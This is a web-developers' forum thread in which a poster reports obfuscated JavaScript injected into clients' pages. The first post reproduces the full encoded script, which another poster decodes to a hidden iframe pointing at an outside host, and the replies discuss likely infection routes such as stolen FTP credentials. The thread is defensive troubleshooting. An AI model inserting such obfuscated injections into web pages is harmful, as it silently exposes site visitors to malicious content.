How did this javascript get in...

[kre8web]

On the 17th of this month a couple of clients reporting a dialler had started popping up on their sites. A closer look revealed the following javascript had been addded and hidden at the bottom of the page.

<script language="JavaScript">
e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA%C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA%C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE%8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6%CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%99%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>

Now my question is how have they managed to get this javascript onto the page? Im presuming theres either been a server or security issue somewhere, however one of the effected sites uses no scripting outside of password protected cms. Any thoughts would be greatly appreciated

[chirpy]

Make sure that you're not suffering from this:
http://forums.cpanel.net/showthread.php?t=51214

[kre8web]

Hmm, the problem is that the server in question is not one i have root access to, indeed its a 3rd party host who are refusing to accept responsibility. They keep suggesting its a secuirty hole in one of the scripts running on the site, which i mean is quite possible i guess, however the same scripts are running on over 14 other sites on differetn servers and hosts without problem. The server is cPanel based so i'm going to try disabling enable_dl via htaccess in the root and see if that solves it.

[richy]

We've seen this as well recently - IIRC the user in question hadn't updated their antivirus in over 3 months and had recently made changes to the "infected pages" which indicates a virus is changing HTML pages on their harddrives and when they update their site.. Boom!

[reliableDerrick]

After I figured out how to decode the javascript there (replace document.write with alert), it turns out to be some html for a hidden iframe going to dnv-counter.com/trf, and while the site isn't up now, I don't recommend anyone try to visit it. Google hasn't turned up many results, and it seems like anti-virus programs aren't detecting the virus:

http://www.castlecops.com/postx160127-0-0.html
http://forums.pcapex.com/windows_os_...00247_exe.html

I'm not sure if the second one is the same sort of infection (they were less subtle about making those iframes before), but it seems like the same basic principal. My best guess at the moment is that they're either inserting the javascript into the pages as they're being uploaded, or catching the FTP usernames and passwords, sending them back to the central server, and then uploading modified files themselves.

Could someone who's had their html files infected run task manager and see if you have and weird processes like c:\23423523.exe running, like in the pcapex thread?